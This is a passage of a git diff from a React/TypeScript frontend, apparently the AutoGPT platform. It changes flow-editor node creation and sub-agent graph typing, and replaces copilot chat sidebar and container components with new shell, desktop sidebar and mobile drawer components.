nodeSchema.uiType == BlockUIType.NOTE ? 300 : 500,
60,
1.0,
)
: {
: // we will get all the dimension of nodes, then store
{
x: window.innerWidth / 2 - x,
y: window.innerHeight / 2 - y,
};
const newNode = await createAndAddNode(
blockId,
nodeType,
hardcodedValues,
position,
);
if (!newNode) return;
const newNode: CustomNode = {
id: nodeId.toString(),
type: "custom",
position: viewportCoordinates, // Set the position to the calculated viewport center
data: {
blockType: nodeType,
blockCosts: nodeSchema.costs,
title: `${nodeType} ${nodeId}`,
description: nodeSchema.description,
categories: nodeSchema.categories,
inputSchema: nodeSchema.inputSchema,
outputSchema: nodeSchema.outputSchema,
hardcodedValues: hardcodedValues,
connections: [],
isOutputOpen: false,
block_id: blockId,
isOutputStatic: nodeSchema.staticOutput,
uiType: nodeSchema.uiType,
},
};
addNodes(newNode);
setNodeId((prevId) => prevId + 1);
clearNodesStatusAndOutput(); // Clear status and output when a new node is added
setViewport(
{
x: -position.x * 0.8 + (window.innerWidth - 0.0) / 2,
y: -position.y * 0.8 + (window.innerHeight - 400) / 2,
// Rough estimate of the dimension of the node is: 500x400px.
// Though we skip shifting the X, considering the block menu side-bar.
x: -viewportCoordinates.x * 0.8 + (window.innerWidth - 0.0) / 2,
y: -viewportCoordinates.y * 0.8 + (window.innerHeight - 400) / 2,
zoom: 0.8,
},
{ duration: 500 },
);
history.push({
type: "ADD_NODE",
payload: { node: { ...newNode, ...newNode.data } },
undo: () => deleteElements({ nodes: [{ id: newNode.id }] }),
redo: () => addNodes(newNode),
});
},
[
nodeId,
getViewport,
setViewport,
availableBlocks,
addNodes,
nodeDimensions,
createAndAddNode,
deleteElements,
clearNodesStatusAndOutput,
],
);
@@ -979,7 +920,7 @@ const FlowEditor: React.FC<{
}, []);
const onDrop = useCallback(
async (event: React.DragEvent) => {
(event: React.DragEvent) => {
event.preventDefault();
const blockData = event.dataTransfer.getData("application/reactflow");
@@ -994,17 +935,62 @@ const FlowEditor: React.FC<{
y: event.clientY,
});
await createAndAddNode(
blockId,
blockName,
hardcodedValues || {},
// Find the block schema
const nodeSchema = availableBlocks.find((node) => node.id === blockId);
if (!nodeSchema) {
console.error(`Schema not found for block ID: ${blockId}`);
return;
}
// Create the new node at the drop position
const newNode: CustomNode = {
id: nodeId.toString(),
type: "custom",
position,
);
data: {
blockType: blockName,
blockCosts: nodeSchema.costs || [],
title: `${blockName} ${nodeId}`,
description: nodeSchema.description,
categories: nodeSchema.categories,
inputSchema: nodeSchema.inputSchema,
outputSchema: nodeSchema.outputSchema,
hardcodedValues: hardcodedValues,
connections: [],
isOutputOpen: false,
block_id: blockId,
uiType: nodeSchema.uiType,
},
};
history.push({
type: "ADD_NODE",
payload: { node: { ...newNode, ...newNode.data } },
undo: () => {
deleteElements({ nodes: [{ id: newNode.id } as any], edges: [] });
},
redo: () => {
addNodes([newNode]);
},
});
addNodes([newNode]);
clearNodesStatusAndOutput();
setNodeId((prevId) => prevId + 1);
} catch (error) {
console.error("Failed to drop block:", error);
}
},
[screenToFlowPosition, createAndAddNode],
[
nodeId,
availableBlocks,
nodes,
edges,
addNodes,
screenToFlowPosition,
deleteElements,
clearNodesStatusAndOutput,
],
);
const buildContextValue: BuilderContextType = useMemo(

View File

@@ -4,13 +4,13 @@ import { AgentRunDraftView } from "@/app/(platform)/library/agents/[id]/componen
import { Dialog } from "@/components/molecules/Dialog/Dialog";
import type {
CredentialsMetaInput,
Graph,
GraphMeta,
} from "@/lib/autogpt-server-api/types";
interface RunInputDialogProps {
isOpen: boolean;
doClose: () => void;
graph: Graph;
graph: GraphMeta;
doRun?: (
inputs: Record<string, any>,
credentialsInputs: Record<string, CredentialsMetaInput>,

View File

@@ -9,13 +9,13 @@ import { CustomNodeData } from "@/app/(platform)/build/components/legacy-builder
import {
BlockUIType,
CredentialsMetaInput,
Graph,
GraphMeta,
} from "@/lib/autogpt-server-api/types";
import RunnerOutputUI, { OutputNodeInfo } from "./RunnerOutputUI";
import { RunnerInputDialog } from "./RunnerInputUI";
interface RunnerUIWrapperProps {
graph: Graph;
graph: GraphMeta;
nodes: Node<CustomNodeData>[];
graphExecutionError?: string | null;
saveAndRun: (

View File

@@ -1,5 +1,5 @@
import { GraphInputSchema } from "@/lib/autogpt-server-api";
import { GraphLike, IncompatibilityInfo } from "./types";
import { GraphMetaLike, IncompatibilityInfo } from "./types";
// Helper type for schema properties - the generated types are too loose
type SchemaProperties = Record<string, GraphInputSchema["properties"][string]>;
@@ -36,7 +36,7 @@ export function getSchemaRequired(schema: unknown): SchemaRequired {
*/
export function createUpdatedAgentNodeInputs(
currentInputs: Record<string, unknown>,
latestSubGraphVersion: GraphLike,
latestSubGraphVersion: GraphMetaLike,
): Record<string, unknown> {
return {
...currentInputs,

View File

@@ -1,11 +1,7 @@
import type {
Graph as LegacyGraph,
GraphMeta as LegacyGraphMeta,
} from "@/lib/autogpt-server-api";
import type { GraphModel as GeneratedGraph } from "@/app/api/__generated__/models/graphModel";
import type { GraphMeta as LegacyGraphMeta } from "@/lib/autogpt-server-api";
import type { GraphMeta as GeneratedGraphMeta } from "@/app/api/__generated__/models/graphMeta";
export type SubAgentUpdateInfo<T extends GraphLike = GraphLike> = {
export type SubAgentUpdateInfo<T extends GraphMetaLike = GraphMetaLike> = {
hasUpdate: boolean;
currentVersion: number;
latestVersion: number;
@@ -14,10 +10,7 @@ export type SubAgentUpdateInfo<T extends GraphLike = GraphLike> = {
incompatibilities: IncompatibilityInfo | null;
};
// Union type for Graph (with schemas) that works with both legacy and new builder
export type GraphLike = LegacyGraph | GeneratedGraph;
// Union type for GraphMeta (without schemas) for version detection
// Union type for GraphMeta that works with both legacy and new builder
export type GraphMetaLike = LegacyGraphMeta | GeneratedGraphMeta;
export type IncompatibilityInfo = {

View File

@@ -1,11 +1,5 @@
import { useMemo } from "react";
import type {
GraphInputSchema,
GraphOutputSchema,
} from "@/lib/autogpt-server-api";
import type { GraphModel } from "@/app/api/__generated__/models/graphModel";
import { useGetV1GetSpecificGraph } from "@/app/api/__generated__/endpoints/graphs/graphs";
import { okData } from "@/app/api/helpers";
import { GraphInputSchema, GraphOutputSchema } from "@/lib/autogpt-server-api";
import { getEffectiveType } from "@/lib/utils";
import { EdgeLike, getSchemaProperties, getSchemaRequired } from "./helpers";
import {
@@ -17,38 +11,26 @@ import {
/**
* Checks if a newer version of a sub-agent is available and determines compatibility
*/
export function useSubAgentUpdate(
export function useSubAgentUpdate<T extends GraphMetaLike>(
nodeID: string,
graphID: string | undefined,
graphVersion: number | undefined,
currentInputSchema: GraphInputSchema | undefined,
currentOutputSchema: GraphOutputSchema | undefined,
connections: EdgeLike[],
availableGraphs: GraphMetaLike[],
): SubAgentUpdateInfo<GraphModel> {
availableGraphs: T[],
): SubAgentUpdateInfo<T> {
// Find the latest version of the same graph
const latestGraphInfo = useMemo(() => {
const latestGraph = useMemo(() => {
if (!graphID) return null;
return availableGraphs.find((graph) => graph.id === graphID) || null;
}, [graphID, availableGraphs]);
// Check if there's a newer version available
// Check if there's an update available
const hasUpdate = useMemo(() => {
if (!latestGraphInfo || graphVersion === undefined) return false;
return latestGraphInfo.version! > graphVersion;
}, [latestGraphInfo, graphVersion]);
// Fetch full graph IF an update is detected
const { data: latestGraph } = useGetV1GetSpecificGraph(
graphID ?? "",
{ version: latestGraphInfo?.version },
{
query: {
enabled: hasUpdate && !!graphID && !!latestGraphInfo?.version,
select: okData,
},
},
);
if (!latestGraph || graphVersion === undefined) return false;
return latestGraph.version! > graphVersion;
}, [latestGraph, graphVersion]);
// Get connected input and output handles for this specific node
const connectedHandles = useMemo(() => {
@@ -170,8 +152,8 @@ export function useSubAgentUpdate(
return {
hasUpdate,
currentVersion: graphVersion || 0,
latestVersion: latestGraphInfo?.version || 0,
latestGraph: latestGraph || null,
latestVersion: latestGraph?.version || 0,
latestGraph,
isCompatible: compatibilityResult.isCompatible,
incompatibilities: compatibilityResult.incompatibilities,
};

View File

@@ -18,7 +18,7 @@ interface GraphStore {
outputSchema: Record<string, any> | null,
) => void;
// Available graphs; used for sub-graph updated version detection
// Available graphs; used for sub-graph updates
availableSubGraphs: GraphMeta[];
setAvailableSubGraphs: (graphs: GraphMeta[]) => void;

View File

@@ -1,80 +0,0 @@
"use client";
import { SidebarProvider } from "@/components/ui/sidebar";
import { ChatContainer } from "./components/ChatContainer/ChatContainer";
import { ChatSidebar } from "./components/ChatSidebar/ChatSidebar";
import { MobileDrawer } from "./components/MobileDrawer/MobileDrawer";
import { MobileHeader } from "./components/MobileHeader/MobileHeader";
import { ScaleLoader } from "./components/ScaleLoader/ScaleLoader";
import { useCopilotPage } from "./useCopilotPage";
export function CopilotPage() {
const {
sessionId,
messages,
status,
error,
stop,
createSession,
onSend,
isLoadingSession,
isCreatingSession,
isUserLoading,
isLoggedIn,
// Mobile drawer
isMobile,
isDrawerOpen,
sessions,
isLoadingSessions,
handleOpenDrawer,
handleCloseDrawer,
handleDrawerOpenChange,
handleSelectSession,
handleNewChat,
} = useCopilotPage();
if (isUserLoading || !isLoggedIn) {
return (
<div className="fixed inset-0 z-50 flex items-center justify-center bg-[#f8f8f9]">
<ScaleLoader className="text-neutral-400" />
</div>
);
}
return (
<SidebarProvider
defaultOpen={true}
className="h-[calc(100vh-72px)] min-h-0"
>
{!isMobile && <ChatSidebar />}
<div className="relative flex h-full w-full flex-col overflow-hidden bg-[#f8f8f9] px-0">
{isMobile && <MobileHeader onOpenDrawer={handleOpenDrawer} />}
<div className="flex-1 overflow-hidden">
<ChatContainer
messages={messages}
status={status}
error={error}
sessionId={sessionId}
isLoadingSession={isLoadingSession}
isCreatingSession={isCreatingSession}
onCreateSession={createSession}
onSend={onSend}
onStop={stop}
/>
</div>
</div>
{isMobile && (
<MobileDrawer
isOpen={isDrawerOpen}
sessions={sessions}
currentSessionId={sessionId}
isLoading={isLoadingSessions}
onSelectSession={handleSelectSession}
onNewChat={handleNewChat}
onClose={handleCloseDrawer}
onOpenChange={handleDrawerOpenChange}
/>
)}
</SidebarProvider>
);
}

View File

@@ -1,74 +0,0 @@
"use client";
import { ChatInput } from "@/app/(platform)/copilot/components/ChatInput/ChatInput";
import { UIDataTypes, UIMessage, UITools } from "ai";
import { LayoutGroup, motion } from "framer-motion";
import { ChatMessagesContainer } from "../ChatMessagesContainer/ChatMessagesContainer";
import { CopilotChatActionsProvider } from "../CopilotChatActionsProvider/CopilotChatActionsProvider";
import { EmptySession } from "../EmptySession/EmptySession";
export interface ChatContainerProps {
messages: UIMessage<unknown, UIDataTypes, UITools>[];
status: string;
error: Error | undefined;
sessionId: string | null;
isLoadingSession: boolean;
isCreatingSession: boolean;
onCreateSession: () => void | Promise<string>;
onSend: (message: string) => void | Promise<void>;
onStop: () => void;
}
export const ChatContainer = ({
messages,
status,
error,
sessionId,
isLoadingSession,
isCreatingSession,
onCreateSession,
onSend,
onStop,
}: ChatContainerProps) => {
const inputLayoutId = "copilot-2-chat-input";
return (
<CopilotChatActionsProvider onSend={onSend}>
<LayoutGroup id="copilot-2-chat-layout">
<div className="flex h-full min-h-0 w-full flex-col bg-[#f8f8f9] px-2 lg:px-0">
{sessionId ? (
<div className="mx-auto flex h-full min-h-0 w-full max-w-3xl flex-col">
<ChatMessagesContainer
messages={messages}
status={status}
error={error}
isLoading={isLoadingSession}
/>
<motion.div
initial={{ opacity: 0 }}
animate={{ opacity: 1 }}
transition={{ duration: 0.3 }}
className="relative px-3 pb-2 pt-2"
>
<div className="pointer-events-none absolute left-0 right-0 top-[-18px] z-10 h-6 bg-gradient-to-b from-transparent to-[#f8f8f9]" />
<ChatInput
inputId="chat-input-session"
onSend={onSend}
disabled={status === "streaming"}
isStreaming={status === "streaming"}
onStop={onStop}
placeholder="What else can I help with?"
/>
</motion.div>
</div>
) : (
<EmptySession
inputLayoutId={inputLayoutId}
isCreatingSession={isCreatingSession}
onCreateSession={onCreateSession}
onSend={onSend}
/>
)}
</div>
</LayoutGroup>
</CopilotChatActionsProvider>
);
};

View File

@@ -1,305 +0,0 @@
import { getGetWorkspaceDownloadFileByIdUrl } from "@/app/api/__generated__/endpoints/workspace/workspace";
import {
Conversation,
ConversationContent,
ConversationScrollButton,
} from "@/components/ai-elements/conversation";
import {
Message,
MessageContent,
MessageResponse,
} from "@/components/ai-elements/message";
import { LoadingSpinner } from "@/components/atoms/LoadingSpinner/LoadingSpinner";
import { toast } from "@/components/molecules/Toast/use-toast";
import { ToolUIPart, UIDataTypes, UIMessage, UITools } from "ai";
import { useEffect, useRef, useState } from "react";
import { CreateAgentTool } from "../../tools/CreateAgent/CreateAgent";
import { EditAgentTool } from "../../tools/EditAgent/EditAgent";
import { FindAgentsTool } from "../../tools/FindAgents/FindAgents";
import { FindBlocksTool } from "../../tools/FindBlocks/FindBlocks";
import { RunAgentTool } from "../../tools/RunAgent/RunAgent";
import { RunBlockTool } from "../../tools/RunBlock/RunBlock";
import { SearchDocsTool } from "../../tools/SearchDocs/SearchDocs";
import { GenericTool } from "../../tools/GenericTool/GenericTool";
import { ViewAgentOutputTool } from "../../tools/ViewAgentOutput/ViewAgentOutput";
// ---------------------------------------------------------------------------
// Workspace media support
// ---------------------------------------------------------------------------
/**
* Resolve workspace:// URLs in markdown text to proxy download URLs.
* Detects MIME type from the hash fragment (e.g. workspace://id#video/mp4)
* and prefixes the alt text with "video:" so the custom img component can
* render a <video> element instead.
*/
function resolveWorkspaceUrls(text: string): string {
return text.replace(
/!\[([^\]]*)\]\(workspace:\/\/([^)#\s]+)(?:#([^)\s]*))?\)/g,
(_match, alt: string, fileId: string, mimeHint?: string) => {
const apiPath = getGetWorkspaceDownloadFileByIdUrl(fileId);
const url = `/api/proxy${apiPath}`;
if (mimeHint?.startsWith("video/")) {
return `![video:${alt || "Video"}](${url})`;
}
return `![${alt || "Image"}](${url})`;
},
);
}
/**
* Custom img component for Streamdown that renders <video> elements
* for workspace video files (detected via "video:" alt-text prefix).
* Falls back to <video> when an <img> fails to load for workspace files.
*/
function WorkspaceMediaImage(props: React.JSX.IntrinsicElements["img"]) {
const { src, alt, ...rest } = props;
const [imgFailed, setImgFailed] = useState(false);
const isWorkspace = src?.includes("/workspace/files/") ?? false;
if (!src) return null;
if (alt?.startsWith("video:") || (imgFailed && isWorkspace)) {
return (
<span className="my-2 inline-block">
<video
controls
className="h-auto max-w-full rounded-md border border-zinc-200"
preload="metadata"
>
<source src={src} />
Your browser does not support the video tag.
</video>
</span>
);
}
return (
// eslint-disable-next-line @next/next/no-img-element
<img
src={src}
alt={alt || "Image"}
className="h-auto max-w-full rounded-md border border-zinc-200"
loading="lazy"
onError={() => {
if (isWorkspace) setImgFailed(true);
}}
{...rest}
/>
);
}
/** Stable components override for Streamdown (avoids re-creating on every render). */
const STREAMDOWN_COMPONENTS = { img: WorkspaceMediaImage };
const THINKING_PHRASES = [
"Thinking...",
"Considering this...",
"Working through this...",
"Analyzing your request...",
"Reasoning...",
"Looking into it...",
"Processing your request...",
"Mulling this over...",
"Piecing it together...",
"On it...",
];
function getRandomPhrase() {
return THINKING_PHRASES[Math.floor(Math.random() * THINKING_PHRASES.length)];
}
interface ChatMessagesContainerProps {
messages: UIMessage<unknown, UIDataTypes, UITools>[];
status: string;
error: Error | undefined;
isLoading: boolean;
}
export const ChatMessagesContainer = ({
messages,
status,
error,
isLoading,
}: ChatMessagesContainerProps) => {
const [thinkingPhrase, setThinkingPhrase] = useState(getRandomPhrase);
const lastToastTimeRef = useRef(0);
useEffect(() => {
if (status === "submitted") {
setThinkingPhrase(getRandomPhrase());
}
}, [status]);
// Show a toast when a new error occurs, debounced to avoid spam
useEffect(() => {
if (!error) return;
const now = Date.now();
if (now - lastToastTimeRef.current < 3_000) return;
lastToastTimeRef.current = now;
toast({
variant: "destructive",
title: "Something went wrong",
description:
"The assistant encountered an error. Please try sending your message again.",
});
}, [error]);
const lastMessage = messages[messages.length - 1];
const lastAssistantHasVisibleContent =
lastMessage?.role === "assistant" &&
lastMessage.parts.some(
(p) =>
(p.type === "text" && p.text.trim().length > 0) ||
p.type.startsWith("tool-"),
);
const showThinking =
status === "submitted" ||
(status === "streaming" && !lastAssistantHasVisibleContent);
return (
<Conversation className="min-h-0 flex-1">
<ConversationContent className="flex min-h-screen flex-1 flex-col gap-6 px-3 py-6">
{isLoading && messages.length === 0 && (
<div className="flex min-h-full flex-1 items-center justify-center">
<LoadingSpinner className="text-neutral-600" />
</div>
)}
{messages.map((message, messageIndex) => {
const isLastAssistant =
messageIndex === messages.length - 1 &&
message.role === "assistant";
const messageHasVisibleContent = message.parts.some(
(p) =>
(p.type === "text" && p.text.trim().length > 0) ||
p.type.startsWith("tool-"),
);
return (
<Message from={message.role} key={message.id}>
<MessageContent
className={
"text-[1rem] leading-relaxed " +
"group-[.is-user]:rounded-xl group-[.is-user]:bg-purple-100 group-[.is-user]:px-3 group-[.is-user]:py-2.5 group-[.is-user]:text-slate-900 group-[.is-user]:[border-bottom-right-radius:0] " +
"group-[.is-assistant]:bg-transparent group-[.is-assistant]:text-slate-900"
}
>
{message.parts.map((part, i) => {
switch (part.type) {
case "text":
return (
<MessageResponse
key={`${message.id}-${i}`}
components={STREAMDOWN_COMPONENTS}
>
{resolveWorkspaceUrls(part.text)}
</MessageResponse>
);
case "tool-find_block":
return (
<FindBlocksTool
key={`${message.id}-${i}`}
part={part as ToolUIPart}
/>
);
case "tool-find_agent":
case "tool-find_library_agent":
return (
<FindAgentsTool
key={`${message.id}-${i}`}
part={part as ToolUIPart}
/>
);
case "tool-search_docs":
case "tool-get_doc_page":
return (
<SearchDocsTool
key={`${message.id}-${i}`}
part={part as ToolUIPart}
/>
);
case "tool-run_block":
return (
<RunBlockTool
key={`${message.id}-${i}`}
part={part as ToolUIPart}
/>
);
case "tool-run_agent":
case "tool-schedule_agent":
return (
<RunAgentTool
key={`${message.id}-${i}`}
part={part as ToolUIPart}
/>
);
case "tool-create_agent":
return (
<CreateAgentTool
key={`${message.id}-${i}`}
part={part as ToolUIPart}
/>
);
case "tool-edit_agent":
return (
<EditAgentTool
key={`${message.id}-${i}`}
part={part as ToolUIPart}
/>
);
case "tool-view_agent_output":
return (
<ViewAgentOutputTool
key={`${message.id}-${i}`}
part={part as ToolUIPart}
/>
);
default:
// Render a generic tool indicator for SDK built-in
// tools (Read, Glob, Grep, etc.) or any unrecognized tool
if (part.type.startsWith("tool-")) {
return (
<GenericTool
key={`${message.id}-${i}`}
part={part as ToolUIPart}
/>
);
}
return null;
}
})}
{isLastAssistant &&
!messageHasVisibleContent &&
showThinking && (
<span className="inline-block animate-shimmer bg-gradient-to-r from-neutral-400 via-neutral-600 to-neutral-400 bg-[length:200%_100%] bg-clip-text text-transparent">
{thinkingPhrase}
</span>
)}
</MessageContent>
</Message>
);
})}
{showThinking && lastMessage?.role !== "assistant" && (
<Message from="assistant">
<MessageContent className="text-[1rem] leading-relaxed">
<span className="inline-block animate-shimmer bg-gradient-to-r from-neutral-400 via-neutral-600 to-neutral-400 bg-[length:200%_100%] bg-clip-text text-transparent">
{thinkingPhrase}
</span>
</MessageContent>
</Message>
)}
{error && (
<div className="rounded-lg bg-red-50 p-4 text-sm text-red-700">
<p className="font-medium">Something went wrong</p>
<p className="mt-1 text-red-600">
The assistant encountered an error. Please try sending your
message again.
</p>
</div>
)}
</ConversationContent>
<ConversationScrollButton />
</Conversation>
);
};

View File

@@ -1,188 +0,0 @@
"use client";
import { useGetV2ListSessions } from "@/app/api/__generated__/endpoints/chat/chat";
import { Button } from "@/components/atoms/Button/Button";
import { LoadingSpinner } from "@/components/atoms/LoadingSpinner/LoadingSpinner";
import { Text } from "@/components/atoms/Text/Text";
import {
Sidebar,
SidebarContent,
SidebarFooter,
SidebarHeader,
SidebarTrigger,
useSidebar,
} from "@/components/ui/sidebar";
import { cn } from "@/lib/utils";
import { PlusCircleIcon, PlusIcon } from "@phosphor-icons/react";
import { motion } from "framer-motion";
import { parseAsString, useQueryState } from "nuqs";
export function ChatSidebar() {
const { state } = useSidebar();
const isCollapsed = state === "collapsed";
const [sessionId, setSessionId] = useQueryState("sessionId", parseAsString);
const { data: sessionsResponse, isLoading: isLoadingSessions } =
useGetV2ListSessions({ limit: 50 });
const sessions =
sessionsResponse?.status === 200 ? sessionsResponse.data.sessions : [];
function handleNewChat() {
setSessionId(null);
}
function handleSelectSession(id: string) {
setSessionId(id);
}
function formatDate(dateString: string) {
const date = new Date(dateString);
const now = new Date();
const diffMs = now.getTime() - date.getTime();
const diffDays = Math.floor(diffMs / (1000 * 60 * 60 * 24));
if (diffDays === 0) return "Today";
if (diffDays === 1) return "Yesterday";
if (diffDays < 7) return `${diffDays} days ago`;
const day = date.getDate();
const ordinal =
day % 10 === 1 && day !== 11
? "st"
: day % 10 === 2 && day !== 12
? "nd"
: day % 10 === 3 && day !== 13
? "rd"
: "th";
const month = date.toLocaleDateString("en-US", { month: "short" });
const year = date.getFullYear();
return `${day}${ordinal} ${month} ${year}`;
}
return (
<Sidebar
variant="inset"
collapsible="icon"
className="!top-[50px] !h-[calc(100vh-50px)] border-r border-zinc-100 px-0"
>
{isCollapsed && (
<SidebarHeader
className={cn(
"flex",
isCollapsed
? "flex-row items-center justify-between gap-y-4 md:flex-col md:items-start md:justify-start"
: "flex-row items-center justify-between",
)}
>
<motion.div
key={isCollapsed ? "header-collapsed" : "header-expanded"}
className="flex flex-col items-center gap-3 pt-4"
initial={{ opacity: 0, filter: "blur(3px)" }}
animate={{ opacity: 1, filter: "blur(0px)" }}
transition={{ type: "spring", bounce: 0.2 }}
>
<div className="flex flex-col items-center gap-2">
<SidebarTrigger />
<Button
variant="ghost"
onClick={handleNewChat}
style={{ minWidth: "auto", width: "auto" }}
>
<PlusCircleIcon className="!size-5" />
<span className="sr-only">New Chat</span>
</Button>
</div>
</motion.div>
</SidebarHeader>
)}
<SidebarContent className="gap-4 overflow-y-auto px-4 py-4 [-ms-overflow-style:none] [scrollbar-width:none] [&::-webkit-scrollbar]:hidden">
{!isCollapsed && (
<motion.div
initial={{ opacity: 0 }}
animate={{ opacity: 1 }}
transition={{ duration: 0.2, delay: 0.1 }}
className="flex items-center justify-between px-3"
>
<Text variant="h3" size="body-medium">
Your chats
</Text>
<div className="relative left-6">
<SidebarTrigger />
</div>
</motion.div>
)}
{!isCollapsed && (
<motion.div
initial={{ opacity: 0 }}
animate={{ opacity: 1 }}
transition={{ duration: 0.2, delay: 0.15 }}
className="mt-4 flex flex-col gap-1"
>
{isLoadingSessions ? (
<div className="flex min-h-[30rem] items-center justify-center py-4">
<LoadingSpinner size="small" className="text-neutral-600" />
</div>
) : sessions.length === 0 ? (
<p className="py-4 text-center text-sm text-neutral-500">
No conversations yet
</p>
) : (
sessions.map((session) => (
<button
key={session.id}
onClick={() => handleSelectSession(session.id)}
className={cn(
"w-full rounded-lg px-3 py-2.5 text-left transition-colors",
session.id === sessionId
? "bg-zinc-100"
: "hover:bg-zinc-50",
)}
>
<div className="flex min-w-0 max-w-full flex-col overflow-hidden">
<div className="min-w-0 max-w-full">
<Text
variant="body"
className={cn(
"truncate font-normal",
session.id === sessionId
? "text-zinc-600"
: "text-zinc-800",
)}
>
{session.title || `Untitled chat`}
</Text>
</div>
<Text variant="small" className="text-neutral-400">
{formatDate(session.updated_at)}
</Text>
</div>
</button>
))
)}
</motion.div>
)}
</SidebarContent>
{!isCollapsed && sessionId && (
<SidebarFooter className="shrink-0 bg-zinc-50 p-3 pb-1 shadow-[0_-4px_6px_-1px_rgba(0,0,0,0.05)]">
<motion.div
initial={{ opacity: 0 }}
animate={{ opacity: 1 }}
transition={{ duration: 0.2, delay: 0.2 }}
>
<Button
variant="primary"
size="small"
onClick={handleNewChat}
className="w-full"
leftIcon={<PlusIcon className="h-4 w-4" weight="bold" />}
>
New Chat
</Button>
</motion.div>
</SidebarFooter>
)}
</Sidebar>
);
}

View File

@@ -1,16 +0,0 @@
"use client";
import { CopilotChatActionsContext } from "./useCopilotChatActions";
interface Props {
onSend: (message: string) => void | Promise<void>;
children: React.ReactNode;
}
export function CopilotChatActionsProvider({ onSend, children }: Props) {
return (
<CopilotChatActionsContext.Provider value={{ onSend }}>
{children}
</CopilotChatActionsContext.Provider>
);
}

View File

@@ -1,23 +0,0 @@
"use client";
import { createContext, useContext } from "react";
interface CopilotChatActions {
onSend: (message: string) => void | Promise<void>;
}
const CopilotChatActionsContext = createContext<CopilotChatActions | null>(
null,
);
export function useCopilotChatActions(): CopilotChatActions {
const ctx = useContext(CopilotChatActionsContext);
if (!ctx) {
throw new Error(
"useCopilotChatActions must be used within CopilotChatActionsProvider",
);
}
return ctx;
}
export { CopilotChatActionsContext };

View File

@@ -0,0 +1,99 @@
"use client";
import { ChatLoader } from "@/components/contextual/Chat/components/ChatLoader/ChatLoader";
import { Text } from "@/components/atoms/Text/Text";
import { NAVBAR_HEIGHT_PX } from "@/lib/constants";
import type { ReactNode } from "react";
import { DesktopSidebar } from "./components/DesktopSidebar/DesktopSidebar";
import { MobileDrawer } from "./components/MobileDrawer/MobileDrawer";
import { MobileHeader } from "./components/MobileHeader/MobileHeader";
import { useCopilotShell } from "./useCopilotShell";
interface Props {
children: ReactNode;
}
export function CopilotShell({ children }: Props) {
const {
isMobile,
isDrawerOpen,
isLoading,
isCreatingSession,
isLoggedIn,
hasActiveSession,
sessions,
currentSessionId,
handleOpenDrawer,
handleCloseDrawer,
handleDrawerOpenChange,
handleNewChatClick,
handleSessionClick,
hasNextPage,
isFetchingNextPage,
fetchNextPage,
} = useCopilotShell();
if (!isLoggedIn) {
return (
<div className="flex h-full items-center justify-center">
<ChatLoader />
</div>
);
}
return (
<div
className="flex overflow-hidden bg-[#EFEFF0]"
style={{ height: `calc(100vh - ${NAVBAR_HEIGHT_PX}px)` }}
>
{!isMobile && (
<DesktopSidebar
sessions={sessions}
currentSessionId={currentSessionId}
isLoading={isLoading}
hasNextPage={hasNextPage}
isFetchingNextPage={isFetchingNextPage}
onSelectSession={handleSessionClick}
onFetchNextPage={fetchNextPage}
onNewChat={handleNewChatClick}
hasActiveSession={Boolean(hasActiveSession)}
/>
)}
<div className="relative flex min-h-0 flex-1 flex-col">
{isMobile && <MobileHeader onOpenDrawer={handleOpenDrawer} />}
<div className="flex min-h-0 flex-1 flex-col">
{isCreatingSession ? (
<div className="flex h-full flex-1 flex-col items-center justify-center bg-[#f8f8f9]">
<div className="flex flex-col items-center gap-4">
<ChatLoader />
<Text variant="body" className="text-zinc-500">
Creating your chat...
</Text>
</div>
</div>
) : (
children
)}
</div>
</div>
{isMobile && (
<MobileDrawer
isOpen={isDrawerOpen}
sessions={sessions}
currentSessionId={currentSessionId}
isLoading={isLoading}
hasNextPage={hasNextPage}
isFetchingNextPage={isFetchingNextPage}
onSelectSession={handleSessionClick}
onFetchNextPage={fetchNextPage}
onNewChat={handleNewChatClick}
onClose={handleCloseDrawer}
onOpenChange={handleDrawerOpenChange}
hasActiveSession={Boolean(hasActiveSession)}
/>
)}
</div>
);
}

View File

@@ -0,0 +1,70 @@
import type { SessionSummaryResponse } from "@/app/api/__generated__/models/sessionSummaryResponse";
import { Button } from "@/components/atoms/Button/Button";
import { Text } from "@/components/atoms/Text/Text";
import { scrollbarStyles } from "@/components/styles/scrollbars";
import { cn } from "@/lib/utils";
import { Plus } from "@phosphor-icons/react";
import { SessionsList } from "../SessionsList/SessionsList";
interface Props {
sessions: SessionSummaryResponse[];
currentSessionId: string | null;
isLoading: boolean;
hasNextPage: boolean;
isFetchingNextPage: boolean;
onSelectSession: (sessionId: string) => void;
onFetchNextPage: () => void;
onNewChat: () => void;
hasActiveSession: boolean;
}
export function DesktopSidebar({
sessions,
currentSessionId,
isLoading,
hasNextPage,
isFetchingNextPage,
onSelectSession,
onFetchNextPage,
onNewChat,
hasActiveSession,
}: Props) {
return (
<aside className="flex h-full w-80 flex-col border-r border-zinc-100 bg-zinc-50">
<div className="shrink-0 px-6 py-4">
<Text variant="h3" size="body-medium">
Your chats
</Text>
</div>
<div
className={cn(
"flex min-h-0 flex-1 flex-col overflow-y-auto px-3 py-3",
scrollbarStyles,
)}
>
<SessionsList
sessions={sessions}
currentSessionId={currentSessionId}
isLoading={isLoading}
hasNextPage={hasNextPage}
isFetchingNextPage={isFetchingNextPage}
onSelectSession={onSelectSession}
onFetchNextPage={onFetchNextPage}
/>
</div>
{hasActiveSession && (
<div className="shrink-0 bg-zinc-50 p-3 shadow-[0_-4px_6px_-1px_rgba(0,0,0,0.05)]">
<Button
variant="primary"
size="small"
onClick={onNewChat}
className="w-full"
leftIcon={<Plus width="1rem" height="1rem" />}
>
New Chat
</Button>
</div>
)}
</aside>
);
}

View File

@@ -0,0 +1,91 @@
import type { SessionSummaryResponse } from "@/app/api/__generated__/models/sessionSummaryResponse";
import { Button } from "@/components/atoms/Button/Button";
import { scrollbarStyles } from "@/components/styles/scrollbars";
import { cn } from "@/lib/utils";
import { PlusIcon, X } from "@phosphor-icons/react";
import { Drawer } from "vaul";
import { SessionsList } from "../SessionsList/SessionsList";
interface Props {
isOpen: boolean;
sessions: SessionSummaryResponse[];
currentSessionId: string | null;
isLoading: boolean;
hasNextPage: boolean;
isFetchingNextPage: boolean;
onSelectSession: (sessionId: string) => void;
onFetchNextPage: () => void;
onNewChat: () => void;
onClose: () => void;
onOpenChange: (open: boolean) => void;
hasActiveSession: boolean;
}
export function MobileDrawer({
isOpen,
sessions,
currentSessionId,
isLoading,
hasNextPage,
isFetchingNextPage,
onSelectSession,
onFetchNextPage,
onNewChat,
onClose,
onOpenChange,
hasActiveSession,
}: Props) {
return (
<Drawer.Root open={isOpen} onOpenChange={onOpenChange} direction="left">
<Drawer.Portal>
